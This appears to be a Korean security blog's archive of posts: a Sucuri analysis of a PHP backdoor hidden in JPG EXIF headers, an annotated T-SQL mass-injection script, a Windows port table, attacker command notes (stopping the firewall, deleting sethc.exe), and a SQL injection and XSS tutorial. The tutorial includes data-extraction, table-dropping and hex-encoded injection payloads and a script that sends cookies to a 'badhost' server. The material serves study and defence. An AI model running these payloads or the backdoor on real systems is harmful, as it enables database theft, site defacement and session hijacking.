posted by 블르샤이닝 2013. 7. 17. 10:28
728x90

http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SucuriSecurity+%28Sucuri+Security%29


암호화된 url  복호화 : http://ddecode.com/phpdecoder/?results=4e57b421cfdfc940c3df55c2bbecb408


Malware Hidden Inside JPG EXIF Headers

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves. Exif_read_data is commonly used to read images and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option where if you pass the “/e” modifier it will execute the content (eval), instead of just searching/replacing.

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but in the "Make" header it has a strange keyword: "/.*/e". That's the exact modifier used by preg_replace to execute (eval) whatever is passed to it.

Now things are getting interesting...

If we keep looking at the EXIF data, we can see the "eval ( base64_decode" hidden inside the "Model" header. When you put it all together, we can see what is going on. The attackers are reading both the Maker and Model header from the EXIF and filling the preg_replace with them. Once we modify the $exif['Make'] and $exif['Model'] for what is in the file, we get the final backdoor:

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
Steganography Malware

Another interesting point is that bun.jpg and other images that were compromised, still load and work properly. In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site. This is a curious steganographic way to hide the malware.

Note: Any of Sucuri clients using Server Side Scanning are protected against this type of injection (detected by us).

728x90
posted by 블르샤이닝 2012. 10. 24. 11:15
728x90


항상 문서와 자료는 읽어보라고 있는건데 읽지않고 모아두는 것은 단지 자랑하기 위해서 존재하는 허위허식에서 나오는 것이 아닐까...그러므로 난 잘못한것이다..한번 올리는겸 읽어봐야겠다. 에거....반성의 시간

-----------------------------------------------------------------------------------------------------

//목적은 DB에서 사용자가 만든 모든 테이블 중 데이터 타입이 텍스트인 컬럼을 골라

악성코드 삽입 사이트로 이동하려는 스크립트(                                                    )를 삽입하려는 것입니다.

sql문은 T-SQL 문법이 사용되었으며 대상 DBMS는 MSSQL입니다.


////////////////삽입된 SQL 문//////////////////////////////


;declare @t varchar(255), @c varchar(255)

declare table_cursor cursor for select a.name, b.name from sysobjects a, syscolumn b 

where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

open table_cursor

fetch next from table_cursor into @t, @c  

while(@@fetch_status=0)                  

begin 

exec('update ['+@c+']=rtrim  

cast(                                                     as varchar(53))') 

fetch next from table_cursor into @t,@c  

end 

close table_cursor               

dealocate table_cursor; 


///////////////////////////////////////////////////////////////


**********************설명***************************

;declare @t varchar(255), @c varchar(255)  


//웹페이지의 변수에서 sql문을 끝내기 위해 ; 입력 , varchar타입 255크기의 t, c 변수선언


declare table_cursor cursor for select a.name, b.name from sysobjects a, syscolumn b 


where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

// 시스템정보를 가지고있는 테이블 조회(sysobjects, syscolumn)

// sysobjects 테이블의 xtype='u'인 테이블은 데이터베이스내에 사용자가 만든 테이블을 의미

//syscolumn의 xtype은 99 : ntext, 35 : text, 231 : nvarchar, 167 : varchar 로 

//테이블의 각 칼럼의 타입이 문자열 형인것을 찾아서 반환해주는것을 의미



open table_cursor //셀렉트문이 있는 커서를 염

fetch next from table_cursor into @t, @c 

 //커서에 대한 테이블이름을 t로 넣고 컬럼명을 c 변수로 넣음

while(@@fetch_status=0)                   //커서가 열려있을경우 시작

begin                                                 //루프시작

exec('update ['+@c+']=rtrim             // 오른쪽 공백 삭제

(convert(varchar(4000),['+@c+]))+    //해당 컬럼의 데이터형을 varchar(4000)으로 변경

cast(                                                     as varchar(53))') 

//삽입하려는 악성코드 삽입 사이트 문자열을 varchar(53)형으로 바꿈


fetch next from table_cursor into @t,@c  //다음 테이블과 컬럼 가져오기 루프

end 


close table_cursor               //커서닫기

dealocate table_cursor;          //커서 제거


*********************************************************************


이상입니다 수고하십시오~


728x90
posted by 블르샤이닝 2012. 3. 5. 12:10
728x90
기업에서 방화벽을 사용하다 보면, 작게 보면 윈도우 방화벽을 사용하더라도 특정한 프로그램(서비스)을 위해서 포트를 개방해야 할 경우가 종종 있습니다.

아래 제공하는 자료는 윈도우의 서비스 별로 사용하는 포트를 정리한 문서입니다.

표 축소표 확대
포트 프로토콜 응용 프로그램 프로토콜 시스템 서비스 이름
n/a GRE GRE(IP 프로토콜 47) 라우팅 및 원격 액세스
n/a ESP IPsec ESP(IP 프로토콜 50) 라우팅 및 원격 액세스
n/a AH IPsec AH(IP 프로토콜 51) 라우팅 및 원격 액세스
7 TCP Echo 단순 TCP/IP 서비스
7 UDP Echo 단순 TCP/IP 서비스
9 TCP Discard 단순 TCP/IP 서비스
9 UDP Discard 단순 TCP/IP 서비스
13 TCP Daytime 단순 TCP/IP 서비스
13 UDP Daytime 단순 TCP/IP 서비스
17 TCP Quotd 단순 TCP/IP 서비스
17 UDP Quotd 단순 TCP/IP 서비스
19 TCP Chargen 단순 TCP/IP 서비스
19 UDP Chargen 단순 TCP/IP 서비스
20 TCP FTP 기본 데이터 FTP 게시 서비스
21 TCP FTP 제어 FTP 게시 서비스
21 TCP FTP 제어 응용 프로그램 계층 게이트웨이 서비스
23 TCP 텔넷 텔넷
25 TCP SMTP Simple Mail Transfer Protocol
25 TCP SMTP Exchange Server
42 TCP WINS 복제 Windows Internet Name Service
42 UDP WINS 복제 Windows Internet Name Service
53 TCP DNS DNS 서버
53 UDP DNS DNS 서버
53 TCP DNS 인터넷 연결 방화벽/인터넷 연결 공유
53 UDP DNS 인터넷 연결 방화벽/인터넷 연결 공유
67 UDP DHCP 서버 DHCP 서버
67 UDP DHCP 서버 인터넷 연결 방화벽/인터넷 연결 공유
69 UDP TFTP Trivial FTP 데몬 서비스
80 TCP HTTP Windows Media 서비스
80 TCP HTTP World Wide Web 게시 서비스
80 TCP HTTP SharePoint Portal Server
88 TCP Kerberos Kerberos 키 배포 센터
88 UDP Kerberos Kerberos 키 배포 센터
102 TCP X.400 Microsoft Exchange MTA 스택
110 TCP POP3 Microsoft POP3 서비스
110 TCP POP3 Exchange Server
119 TCP NNTP Network News Transfer Protocol
123 UDP NTP Windows 시간
123 UDP SNTP Windows 시간
135 TCP RPC 메시지 대기열
135 TCP RPC 원격 프로시저 호출
135 TCP RPC Exchange Server
135 TCP RPC 인증서 서비스
135 TCP RPC 클러스터 서비스
135 TCP RPC 분산 파일 시스템
135 TCP RPC 분산 링크 추적
135 TCP RPC Distributed Transaction Coordinator
135 TCP RPC 분산 파일 복제 서비스
135 TCP RPC 팩스 서비스
135 TCP RPC Microsoft Exchange Server
135 TCP RPC 파일 복제 서비스
135 TCP RPC 그룹 정책
135 TCP RPC 로컬 보안 기관
135 TCP RPC 원격 저장소 알림
135 TCP RPC 원격 저장소 서버
135 TCP RPC Systems Management Server 2.0
135 TCP RPC 터미널 서비스 라이선스
135 TCP RPC 터미널 서비스 세션 디렉터리
137 UDP NetBIOS 이름 확인 컴퓨터 브라우저
137 UDP NetBIOS 이름 확인 서버
137 UDP NetBIOS 이름 확인 Windows Internet Name Service
137 UDP NetBIOS 이름 확인 Net Logon
137 UDP NetBIOS 이름 확인 Systems Management Server 2.0
138 UDP NetBIOS 데이터그램 서비스 컴퓨터 브라우저
138 UDP NetBIOS 데이터그램 서비스 메신저
138 UDP NetBIOS 데이터그램 서비스 서버
138 UDP NetBIOS 데이터그램 서비스 Net Logon
138 UDP NetBIOS 데이터그램 서비스 분산 파일 시스템
138 UDP NetBIOS 데이터그램 서비스 Systems Management Server 2.0
138 UDP NetBIOS 데이터그램 서비스 라이선스 로깅 서비스
139 TCP NetBIOS 세션 서비스 컴퓨터 브라우저
139 TCP NetBIOS 세션 서비스 팩스 서비스
139 TCP NetBIOS 세션 서비스 성능 로그 및 경고
139 TCP NetBIOS 세션 서비스 인쇄 스풀러
139 TCP NetBIOS 세션 서비스 서버
139 TCP NetBIOS 세션 서비스 Net Logon
139 TCP NetBIOS 세션 서비스 원격 프로시저 호출 로케이터
139 TCP NetBIOS 세션 서비스 분산 파일 시스템
139 TCP NetBIOS 세션 서비스 Systems Management Server 2.0
139 TCP NetBIOS 세션 서비스 라이선스 로깅 서비스
143 TCP IMAP Exchange Server
161 UDP SNMP SNMP 서비스
162 UDP SNMP 트랩 아웃바운드 SNMP 트랩 서비스
389 TCP LDAP 서버 로컬 보안 기관
389 UDP LDAP 서버 로컬 보안 기관
389 TCP LDAP 서버 분산 파일 시스템
389 UDP LDAP 서버 분산 파일 시스템
443 TCP HTTPS HTTP SSL
443 TCP HTTPS World Wide Web 게시 서비스
443 TCP HTTPS SharePoint Portal Server
443 TCP RPC over HTTPS Exchange Server 2003
445 TCP SMB 팩스 서비스
445 TCP SMB 인쇄 스풀러
445 TCP SMB 서버
445 TCP SMB 원격 프로시저 호출 로케이터
445 TCP SMB 분산 파일 시스템
445 TCP SMB 라이선스 로깅 서비스
445 TCP SMB Net Logon
464 UDP Kerberos Password V5 Kerberos 키 배포 센터
464 TCP Kerberos Password V5 Kerberos 키 배포 센터
500 UDP IPsec ISAKMP 로컬 보안 기관
515 TCP LPD TCP/IP 인쇄 서버
548 TCP Macintosh용 파일 서버 Macintosh용 파일 서버
554 TCP RTSP Windows Media 서비스
563 TCP SSL을 통한 NNTP Network News Transfer Protocol
593 TCP RPC over HTTPS 끝점 매퍼 원격 프로시저 호출
593 TCP RPC over HTTPS Exchange Server
636 TCP LDAP SSL 로컬 보안 기관
636 UDP LDAP SSL 로컬 보안 기관
993 TCP SSL을 통한 IMAP Exchange Server
995 TCP SSL을 통한 POP3 Exchange Server
1067 TCP 설치 부트스트랩 서비스 설치 부트스트랩 프로토콜 서버
1068 TCP 설치 부트스트랩 서비스 설치 부트스트랩 프로토콜 클라이언트
1270 TCP MOM-Encrypted Microsoft Operations Manager 2000
1433 TCP SQL over TCP Microsoft SQL Server
1433 TCP SQL over TCP MSSQL$UDDI
1434 UDP SQL Probe Microsoft SQL Server
1434 UDP SQL Probe MSSQL$UDDI
1645 UDP 레거시 RADIUS 인터넷 인증 서비스
1646 UDP 레거시 RADIUS 인터넷 인증 서비스
1701 UDP L2TP 라우팅 및 원격 액세스
1723 TCP PPTP 라우팅 및 원격 액세스
1755 TCP MMS Windows Media 서비스
1755 UDP MMS Windows Media 서비스
1801 TCP MSMQ 메시지 대기열
1801 UDP MSMQ 메시지 대기열
1812 UDP RADIUS 인증 인터넷 인증 서비스
1813 UDP RADIUS 계정 인터넷 인증 서비스
1900 UDP SSDP SSDP 검색 서비스
2101 TCP MSMQ-DC 메시지 대기열
2103 TCP MSMQ-RPC 메시지 대기열
2105 TCP MSMQ-RPC 메시지 대기열
2107 TCP MSMQ-Mgmt 메시지 대기열
2393 TCP OLAP Services 7.0 SQL Server: 하위 수준 OLAP 클라이언트 지원
2394 TCP OLAP Services 7.0 SQL Server: 하위 수준 OLAP 클라이언트 지원
2460 UDP MS Theater Windows Media 서비스
2535 UDP MADCAP DHCP 서버
2701 TCP SMS 원격 제어(제어) SMS 원격 제어 에이전트
2701 UDP SMS 원격 제어(제어) SMS 원격 제어 에이전트
2702 TCP SMS 원격 제어(데이터) SMS 원격 제어 에이전트
2702 UDP SMS 원격 제어(데이터) SMS 원격 제어 에이전트
2703 TCP SMS 원격 채팅 SMS 원격 제어 에이전트
2703 UPD SMS 원격 채팅 SMS 원격 제어 에이전트
2704 TCP SMS 원격 파일 전송 SMS 원격 제어 에이전트
2704 UDP SMS 원격 파일 전송 SMS 원격 제어 에이전트
2725 TCP SQL Analysis Services SQL Analysis Server
2869 TCP UPNP 범용 플러그 앤 플레이 장치 호스트
2869 TCP SSDP 이벤트 알림 SSDP 검색 서비스
3268 TCP 글로벌 카탈로그 서버 로컬 보안 기관
3269 TCP 글로벌 카탈로그 서버 로컬 보안 기관
3343 UDP 클러스터 서비스 클러스터 서비스
3389 TCP 터미널 서비스 NetMeeting 원격 데스크톱 공유
3389 TCP 터미널 서비스 터미널 서비스
3527 UDP MSMQ-Ping 메시지 대기열
4011 UDP BINL 원격 설치
4500 UDP NAT-T 로컬 보안 기관
5000 TCP SSDP 레거시 이벤트 알림 SSDP 검색 서비스
5004 UDP RTP Windows Media 서비스
5005 UDP RTCP Windows Media 서비스
6001 TCP 정보 저장소 Exchange Server 2003
6002 TCP 디렉터리 조회 Exchange Server 2003
6004 TCP DSProxy/NSPI Exchange Server 2003
42424 TCP ASP.NET 세션 상태 ASP.NET 상태 서비스
51515 TCP MOM-Clear Microsoft Operations Manager 2000
1024-65535 TCP RPC 임의로 할당된 상위 TCP 포트

보다 자세한 사항은  http://support.microsoft.com/kb/832017 을 참고하십시오. 이 문서에는 윈도우 뿐만 아니라 SQL Server와 같이 자주 사용하는 프로그램에 대한 자료도 포함하고 있습니다.
728x90
posted by 블르샤이닝 2012. 2. 23. 11:14
728x90

중국 해커들이 자주쓰는 해킹 명령어

1. ver - 시스템 버전 확인

2. tasklist - 사용중인 프로세서 나열

3. taskkill - 프로세서를 선별적으로 죽일수 있다.
사용법: taskkill /f /im 360safe.exe 혹은 taskkill /f /pid 3389

4. net start - 프로세서 시작 명령어
사용법: net start net start w3svc(iis 시작)

5. net stop - 지정된 서비스를 중지한다
사용법: net stop net stop sharedaccess (windows 방화벽 중지)

6. cacls - 파일 권한을 변경 및 실행
사용법: cacls c:\windows\mm.exe /P everyone:R혹은 caclsc:\progra~1\rising\ravmond.exe /d:everyone

7. & - 여개의 명령을 집행한다
사용법:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe

8. echo y| - “결정(Y/N)을 ? 제시문이 나오면 자동으로 Y를 입력한다
사용법:echo y|echo y|
cacls c:\windows\mm.exe /P everyone:R;

9. net user/group

10. shutdown
--------------------------------------------------------------------------------------------------
위에 기능들은 주로 bot에서 나오는 기술입니다. 특히 계산기를 이용해 인젝션하는경우는 시스템의 권한문제를 위해 근래에 자주 사용하는편이고 그외 기능들은 예전부터 이미 사용되어왔습니다. 
추가로 안티리버싱에서 레지스트리에 디버깅설정을 해놓아서 백신이 정상적으로 동작하지 않게 하는게 종종 발견되는데....나중에 그부분도 올리면 재밌어하실분들이 있을것같네요^^


728x90
posted by 블르샤이닝 2012. 2. 22. 20:05
728x90
출처 : http://hummingbird.tistory.com/3488

컴퓨터를 이용하여 다양한 소프트웨어를 사용자의 의지에 따라 설치하거나 자신도 모르게 설치되는 과정에서 프로그램의 버그(Bug)로 인하여 Internet Explorer 웹 브라우저가 실행되지 않는 경우를 경험할 수 있습니다.


이런 경우 오류 메시지가 나타난다면 조금이나마 문제를 유발하는 프로그램을 찾을 수 있지만, 그림과 같이 웹 브라우저 실행 후 메뉴가 표시되지 않으며 얼어버리는 경우에는 난감할 수 있습니다.

우선 가장 의심할 부분은 Internet Explorer 웹 브라우저가 실행될 경우 iexplore.exe 프로세스가 생성되며, 해당 프로세스와 함께 연동되는 확장 프로그램을 점검할 필요가 있습니다.


긴급하게 Internet Explorer 웹 브라우저를 실행할 수 있는 방법 중에는 시작 단추를 클릭하여 제시되는 "인터넷 Internet Explorer" 아이콘에 마우스 우클릭을 통해 "추가 기능을 사용하지 않고 찾아보기" 항목을 클릭하시기 바랍니다.


또는 "시작 → 실행 → about:NoAdd-ons" 명령어를 통해 추가 기능을 사용하지 않고 Internet Explorer 웹 브라우저를 실행할 수도 있으므로 참고하시기 바랍니다.


이럴 경우 이전에 실행되지 않던 웹 브라우저는 제한된 환경에서 Internet Explorer 웹 브라우저가 실행되는 것을 확인할 수 있습니다.


웹 브라우저의 "도구 → 추가 기능 관리" 메뉴를 실행하여 "도구 모음 및 확장 프로그램"에 등록된 모든 추가 기능 항목을 하나씩 선택하여 ① 추가 정보 확인을 통한 연결 프로그램(파일)을 확인하여 수상한 프로그램을 찾으시기 바라며 ② 광고 프로그램 등 원치 않는 프로그램의 경우 "사용 안 함"으로 변경을 하시기 바랍니다.

모든 작업이 완료된 후에는 Internet Explorer 웹 브라우저를 종료한 후, 정상적으로 Internet Explorer 웹 브라우저를 실행하여 동작 여부를 체크하시기 바랍니다.

만약 추가 기능 관리에서 특정 항목의 기능을 중지한 후 웹 브라우저가 정상적인 동작을 하였다면 해당 항목과 연결된 프로그램을 찾아 제어판을 통한 삭제 또는 수동으로 관련 프로그램을 삭제하시기 바랍니다.

마지막으로 국내에서는 광범위한 유포 경로를 통하여 Internet Explorer 웹 브라우저에 브라우저 도우미 개체(BHO) 방식으로 등록하는 사례가 매우 많으며, 이들 프로그램 중에서는 웹 브라우저를 이용하여 인터넷을 이용하는 과정에서 다양한 문제를 유발할 수 있으므로 잘 활용해 보시기 바랍니다.
 
728x90
posted by 블르샤이닝 2012. 2. 21. 16:08
728x90

SQL Injection and Cross-Site Scripting

Posted by  Filed under: Penetration Testing,Security articles - 17 Feb 2012 Tags: ,

Introduction

For the past couple months, I was helping on patching up several legacy web applications from the Cross-Site Scripting and SQL Injection vulnerabilities. I found lots of articles regarding this topic through Google but reading and experiment with it are virtually two different things. So I decided to put together a small sample code to examine the vulnerabilities that I found. You are welcome to download this sample code.

12/20/2010 – Added example to demonstrate JavaScript Event injection vulnerability.

What is SQL Injection and Cross-site scripting?

Cross-Site Scripting (XSS or CSS)
• Enables malicious attackers to inject client-side script (JavaScript) or HTML markup into web pages viewed by other users.

SQL Injection
• Insertion of a SQL query via the input data from the client to the application that are later passed to an instance of SQL Server for parsing and execution.
• Very common with PHP and Classic ASP applications.

SQL Injection and Cross-Site Scripting attack are not relatively new topic. Read more about it from:
• Cross-Site Scripting
• SQL Injection –MSDN
• SQL Injection – Wikipedia

The mentioned vulnerabilities can happens via the
1. Query string
2. Form input box

Sample Application

Steps to Set Up the Sample Application

1. Create a new database and name in TestDB.
2. Create a new login and map it to TestDB.
3. Run the TestDBSetup.sql.

Steps to Run the Sample Application

1. This sample code requires Visual Studio 2008 or newer, if you don’t have it, download the 90-day trial edition from Microsoft (Click Here).
2. Download the sample code and unzip it.
3. Update the connectionString in the web.config.
4. Run the application and follow the sample described in this article. Make sure to remove any line break from the sample URL when copy and paste.
5. Shown below is the structure of the sample code.

Figure 1 
File structure

Query string

SQL Injection

Definition: Insertion of a SQL query via the input data from the client to the application that are later passed to an instance of SQL Server for parsing and execution.

UNION SQL Injection

We will use the UNION statement to mine all the table names in the database. The two consecutive hyphens “–” indicates the SQL comments. See below, the comments are in green color, the query statement after the hyphens will not evaluated by the SQL server.

Listing 1

SELECT * FROM dbo.MyComments WHERE ID = 1 –ORDER BY [Name]

Execute the URL shown below.

Listing 2

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL FROM INFORMATION_SCHEMA.TABLES–

It will yield the results “All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.” This error message emerges if we try to run a UNIONINTERSECT or EXCEPT query that has not an equal number of expressions in their SELECT list sections. The work around is to keep adding the NULLexpression in the URL until the error message disappears.

Listing 3

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, NULL FROM INFORMATION_SCHEMA.TABLES–

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES–

The error message will disappears if the query has equal number of expression in the UNION query. Next, try to replace each of the NULL value with TABLE_NAME. If you get an error message, leave it NULL.

Listing 4

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME, NULL, NULL FROM INFORMATION_SCHEMA.TABLES–

Results
Figure 2

Table name

From the output displayed above, we know that the database contains several tables namely MyComments, tbl_SQLInjection, tbl_users and TestTable.

Next, we will extract every columns name in tbl_users table. Execute the URL shown in listing 5.

Listing 5

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ‘tbl_users’–

Result
Figure 3
tbl_users column

From the output displayed above, we witnessed that the tbl_users contains address, password, phone, secret, secret2 and username columns. To confirms that, shown below is the snapshot of tbl_users table schema from the SQL server.

Figure 4
tbl_users column SQL

Repeat the same step with different table name.

Listing 6

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ‘MyComments’– …

Let retrieve the data stored in tbl_users table. The %2b and %27 are the URL encoding of the “+” and “‘” character respectively. Execute the URL shown below with the string highlighted in grey.

Listing 7

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, username%2B %27 – %27%2Bpassword, secret %2B %27 – %27 %2B secret2, address, phone %2B %27 – %27 %2Baddress, NULL, NULL FROM tbl_users–

Results
Figure 5
tbl_users content

To confirms that, shown below is the snapshot of tbl_users table contents. Repeat the same step for the rest of the tables.

Figure 6
tbl_users content SQL

Retrieve data from sysprocesses table

We also can retrieve the SQL server instance name, login name, database name, SQL server version, and etc… from themaster..sysprocesses table. Execute the URL below and observe the output.

Listing 8

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, DB_Name([dbid]) %2B CHAR(0x2d) %2B loginame, net_address, hostname %2B CHAR(0x2d) %2B %40%40ServerName, %40%40version, NULL, NULL FROM master..sysprocesses–

 

UPDATE the table

Listing 9

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE tbl_Users SET Password = ‘HACKED’ WHERE username =’test@test.com’ –

Result
Figure 7
Modify password SQL

DELETE the data in the table

Listing 10

http://localhost:1234/Sample/ListComments.aspx?cid=99999 DELETE FROM tbl_Users WHERE username =’test@test.com’ –

TRUNCATE the table

Listing 11

http://localhost:1234/Sample/ListComments.aspx?cid=99999 TRUNCATE TABLE tbl_Users –

DROP the table

Listing 12

http://localhost:1234/Sample/ListComments.aspx?cid=99999 DROP TABLE tbl_Users –

Hex based SQL injection

Once in a while, we will see some strange entries as listed below in the server log file.

Listing 13

http://www.YourDomain.com/SomePage.asp?id=1 &cat=c
DECLARE%20@S%20NVARCHAR(4000);
SET%20@S=CAST(4445434c415245204054207661726368617228323535292c40432076617263
68617228343030302920da4445434c415245205461626c655f437572736f72204
35552534f5220464f5220da73656c65637420612e6e616d652c622e6e616d6520
6726f6d207379736f626a6563747320612c737973636f6c756d6e73206220da77
6865726520612e69643d622e696420616e6420612e78747970653d27752720616
e642028622e78747970653d3939206f7220622e78747970653d3335206f722062
2e78747970653d323331206f7220622e78747970653d3136372920da4f50454e2
05461626c655f437572736f72204645544348204e4558542046524f4d20205461
626c655f437572736f7220494e544f2040542c4043205748494c452840404645…

Which when decoded to string will becomes (PLEASE DO NOT COPY AND RUN THIS QUERY)

Listing 14

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
 select a.name,b.name from sysobjects a,syscolumns b
 where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231
 or b.xtype=167)
 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
 BEGIN
 exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://badscript.com/bad.js">
 </script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script
 src="http://badscript.com/bad.js"></script><!--''')
 FETCH NEXT FROM
 Table_Cursor INTO @T,@C END CLOSE
 Table_Cursor DEALLOCATE Table_Cursor

The above query will find all the text columns in the table of each database and append a malicious script to it.

Example

Shown below is a URL with a query string to retrieve comment from the SQL server by comment id.

http://localhost:1234/Sample/ListComments.aspx?cid=1

For the sake of simplicity, I’m using a simple update statement to update the table. The “UPDATE dbo.MyComments SET test=’HACKED’” query will look like 0x5550444154452064626f2e4d79436f6d6d656
e74732053455420746573743d274841434b454427 in hexadecimal. The %3b is the URL encoding of the “;” character. Append the string highlighted in grey to the URL. See below.

Listing 15

http://localhost:1234/Sample/ListComments.aspx?cid=1
DECLARE @S VARCHAR(255) SET @s=CAST(0x5550444154452064626f2e4d79436f6d6d656e
74732053455420746573743d274841434b454427 AS VARCHAR(255)) exec (@s)–
Or
http://localhost:1234/Sample/ListComments.aspx?cid=1 DECLARE @S VARCHAR(255)SET @s=CAST(0x5550444154452064626f2e4d79436f6d6d656e747320534554207465737
43d274841434b454427 AS VARCHAR(255)) exec (@s)–

Before executing the above URL

Figure 8
Before executing

After executing the above URL

Figure 9
After qs injection

Quick test

Append the below string to your web pages URL that take parameters.

Listing 16

http://localhost:1234/Sample/ListComments.aspx?cid=1 DECLARE @S VARCHAR(500)
SET @s= CAST(0x4946204f424a4543545f4944282774626c5f5
3514c496e6a656374696f6e272c275527292
04953204e554c4c20435245415445205441424c452064626f2e5b
74626c5f53514c496e6a656374696f6e5d285b4f75747075745d2
05b766172636861725d2835303029204e554c4c2920494e534552
5420494e544f2064626f2e74626c5f53514c496e6a656374696f6
e2053454c454354202770616765202d205375626a65637420746
f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)–

If the URL parameter value is not an integer, try append ‘; or ‘); or ; in front of the DECLARE keyword. See below for an example.

Listing 17

; DECLARE @S VARCHAR(500) SET @s=
CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f
6e272c27552729204953204e554c4c20435245415445205441424c452064626f2
e5b74626c5f53514c496e6a656374696f6e5d285b4f75747075745d205b766172
636861725d2835303029204e554c4c2920494e5345525420494e544f2064626f2
e74626c5f53514c496e6a656374696f6e2053454c454 354202770616765202d2
05375626a65637420746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)– …

Then, execute this query “SELECT * FROM dbo.tbl_SQLInjection” in SQL Server Management Studio. If you see the results similar to the one shown below, then the web page is subjected to Hex based SQL Injection. Repeat the above step for the rest of the web pages.

Figure 10
afrer hacked

If the URL parameter value is not an integer, try append ‘; or ‘); or ; in front of the query.

Cross-Site Scripting (CSS/XSS) attack

Definition: Enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users.
Let say we have a login page and it will display an error message for every unsuccessful attempt. The error message is stored within the query string of the URL and later display in the Label control. See figure 11.

Figure 11
Login page
Consider this scenario, an anonymous user sends you an email with the following content:

Listing 18

Dear Admin,
There is problem with the login page: http://localhost:1234/Sample/LoginPage.aspx?strErr=
%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%6
9%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
Or
“There is problem with the login page http://localhost:1234/Sample/LoginPage.aspx” with the URL pointing to the above link.

The part of the URL highlighted in grey is encoded in Hexadecimal value. When decoded, it will become

Listing 19

http://localhost:1234/Sample/LoginPage.aspx?strErr=”><script src=”http://localhost:9997/badhost/maliciousscript.js”></script>

If we let our guard down and click on the link in the email, the browser will execute the malicious scripts. Execute the URL and you should see a pop-up message. Shown below is a script embedded in the query string to steal browser cookies.

Listing 20

http://localhost:1234/Sample/LoginPage.aspx?strErr=
%3C%73%63%72%69%70%74%3E%76%61%72%20%73%3D%27%3C%49%46%52%41%4D%45%20%73%74%79%
6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%20%53%52%43%3D%68%74%74%70%3
A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%63
%6F%6F%6B%69%65%6D%6F%6E%73%74%65%72%2E%61%73%70%78%3F%63%3D%27%2b%65%73%63%61%
70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2b%27%3E%3C%5C%2F%49%
46%52%41%4D%45%3E%27%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%3C%
2F%73%63%72%69%70%74%3E

When decoded, it will look like:

Listing 21

http://localhost:1234/Sample/LoginPage.aspx?strErr=<script>var s=’<IFRAME style=”display:none” SRC=http://localhost:9997/badhost/cookiemonster.aspx?c= ‘%2bescape(document.cookie)%2b’><\/IFRAME>’;document.write(s)</script>

